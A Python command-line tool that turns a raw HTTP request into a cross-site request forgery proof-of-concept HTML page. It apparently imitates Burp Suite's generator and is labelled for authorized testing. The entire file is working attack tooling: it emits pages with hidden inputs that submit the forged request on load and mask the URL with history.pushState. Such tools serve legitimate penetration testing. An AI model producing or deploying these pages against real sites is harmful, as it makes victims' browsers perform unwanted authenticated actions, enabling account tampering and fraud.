#!/usr/bin/env python3

"""
CSRF PoC Generator CLI Tool

Usage:
    python3 csrf_poc_gen.py request.txt

Description:
    Generates a CSRF Proof-of-Concept HTML page from a raw HTTP request.
    Output matches Burp Suite Professional's "Generate CSRF PoC" format.
    For authorized security testing only.
"""

import sys
import urllib.parse


def parse_request(file_path):
    with open(file_path, 'r') as f:
        raw = f.read()

    lines = raw.splitlines()

    # Request line: METHOD /path?query HTTP/version
    request_line = lines[0]
    parts = request_line.split()
    method = parts[0].upper()
    full_path = parts[1]          # may include query string for GET
    http_version = parts[2]       # e.g. HTTP/1.1 or HTTP/2

    headers = {}
    body = ""

    is_body = False
    for line in lines[1:]:
        if line.strip() == "":
            is_body = True
            continue
        if not is_body:
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip().lower()] = value.strip()
        else:
            body += line.strip()

    host = headers.get("host", "")
    scheme = "https" if http_version == "HTTP/2" else "http"

    # Split path from query string (relevant for GET requests)
    if "?" in full_path:
        path_only, query_string = full_path.split("?", 1)
    else:
        path_only, query_string = full_path, ""

    base_url = f"{scheme}://{host}{path_only}"

    return method, base_url, query_string, body


def parse_params(data):
    """Parse URL-encoded param string into an ordered list of (key, value) tuples."""
    if not data:
        return []
    return urllib.parse.parse_qsl(data, keep_blank_values=True)


def html_entity_encode(value):
    """
    Encode every non-alphanumeric, non-safe character as a decimal HTML entity.
    Matches Burp's behaviour: @ -> &#64;  . -> &#46;  / -> &#47; etc.
    """
    safe_chars = set(
        'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
        '-_'
    )
    result = ""
    for ch in value:
        if ch in safe_chars:
            result += ch
        else:
            result += f"&#{ord(ch)};"
    return result


def build_hidden_inputs(params):
    """Render a list of (key, value) pairs as hidden input tags with entity-encoded values."""
    inputs = ""
    for key, value in params:
        encoded_value = html_entity_encode(value)
        inputs += f'      <input type="hidden" name="{key}" value="{encoded_value}" />\n'
    return inputs


def generate_get_poc(base_url, query_string):
    """
    GET PoC - mirrors Burp exactly:
      - Params extracted from query string, rendered as hidden inputs.
      - Form action is the bare URL with NO query string.
      - No method attribute on form (defaults to GET).
      - history.pushState + document.forms[0].submit().
    """
    params = parse_params(query_string)
    inputs = build_hidden_inputs(params)

    html = f"""<html>
  <!-- CSRF PoC - generated by csrf_poc_gen.py -->
  <body>
    <form action="{base_url}">
{inputs}      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
"""
    return html


def generate_post_poc(base_url, body):
    """
    POST PoC - mirrors Burp exactly:
      - Params parsed from request body, rendered as hidden inputs.
      - HTML entity-encoded values.
      - history.pushState + document.forms[0].submit().
      - method="POST" on the form.
    """
    params = parse_params(body)
    inputs = build_hidden_inputs(params)

    html = f"""<html>
  <!-- CSRF PoC - generated by csrf_poc_gen.py -->
  <body>
    <form action="{base_url}" method="POST">
{inputs}      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
"""
    return html


def main():
    if len(sys.argv) != 2:
        print("Usage: python3 csrf_poc_gen.py <request_file>")
        sys.exit(1)

    file_path = sys.argv[1]

    try:
        method, base_url, query_string, body = parse_request(file_path)

        if method == "GET":
            html = generate_get_poc(base_url, query_string)
            param_keys = [k for k, _ in parse_params(query_string)]
        elif method == "POST":
            html = generate_post_poc(base_url, body)
            param_keys = [k for k, _ in parse_params(body)]
        else:
            print(f"[!] Unsupported method: {method}")
            sys.exit(1)

        output_file = "csrf_poc.html"
        with open(output_file, "w") as f:
            f.write(html)

        print(f"[+] CSRF PoC generated: {output_file}")
        print(f"    Method : {method}")
        print(f"    Target : {base_url}")
        print(f"    Params : {param_keys}")

    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()
